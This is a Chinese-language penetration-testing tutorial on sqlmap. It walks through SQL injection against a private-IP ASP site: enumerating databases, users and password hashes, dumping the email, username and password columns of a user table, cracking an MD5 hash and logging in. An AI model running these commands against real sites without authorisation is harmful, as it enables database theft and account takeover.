共計 2081 個字符,預計需要花費 6 分鐘才能閱讀完成。
這篇文章主要介紹滲透測試工具 sqlmap 怎么用,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
一、檢測注入點是否可用
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
參數:
-u:指定注入點 url
注入結果展示:
(1)注入參數 id 為 GET 注入,注入類型有四種分別為:boolean-based blind、error-based、stacked queries、inline query。
(2)web 服務器系統為 windows 2003 or XP
(3)web 應用程序技術為:ASP.NET, Microsoft IIS 6.0
(4)數據庫類型為:SQLSERVER 2000
其中圖一有若干詢問語句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數即可,命令如下:
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--batch
二、暴庫
一條命令即可曝出該 sqlserver 中所有數據庫名稱,命令如下:
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--dbs
參數:
–dbs:dbs 前面有兩條杠,請看清楚。
結果顯示該 sqlserver 中共包含 7 個可用的數據庫。
三、web 當前使用的數據庫
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--current-db
四、web 數據庫使用賬戶
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--current-user
五、列出 sqlserver 所有用戶
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--users
六、數據庫賬戶與密碼
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
--passwords
七、列出數據庫中的表
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
-D tourdata --tables
參數:
-D:指定數據庫名稱
–tables:列出表
結果體現共列出了 34 張表。
八、列出表中字段
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
-D tourdata -T userb --columns
參數:
-D:指定數據庫名稱
-T:指定要列出字段的表
–columns:指定列出字段
結果顯示該 userb 表中包含了 23 條字段。
九、暴字段內容
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
-D tourdata -T userb -C email,Username,userpassword --dump
參數:
-C:指定要暴的字段
–dump:將結果導出
如果字段內容太多,需要花費很多時間。可以指定導出特定范圍的字段內容,命令如下:
C:\Python27\sqlmap python sqlmap.py -u http://192.168.1.150/products.asp?id=134
-D tourdata -T userb -C email,Username,userpassword --start 1 --stop 10 --dump
參數:
–start:指定開始的行
–stop:指定結束的行
此條命令的含義為:導出數據庫 tourdata 中的表 userb 中的字段 (email,Username,userpassword) 中的第 1 到第 10 行的數據內容。
十、驗證結果
通過上圖結果看到其中的一個用戶信息為:
email:123456@qq.com
username: 1.asp
password: 49ba59abbe56e057
通過 md5 解密,得到該 hash 的原文密碼為:123456
拿到賬號密碼我們來測試是否可以登錄
驗證成功!
以上是“滲透測試工具 sqlmap 怎么用”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注丸趣 TV 行業資訊頻道!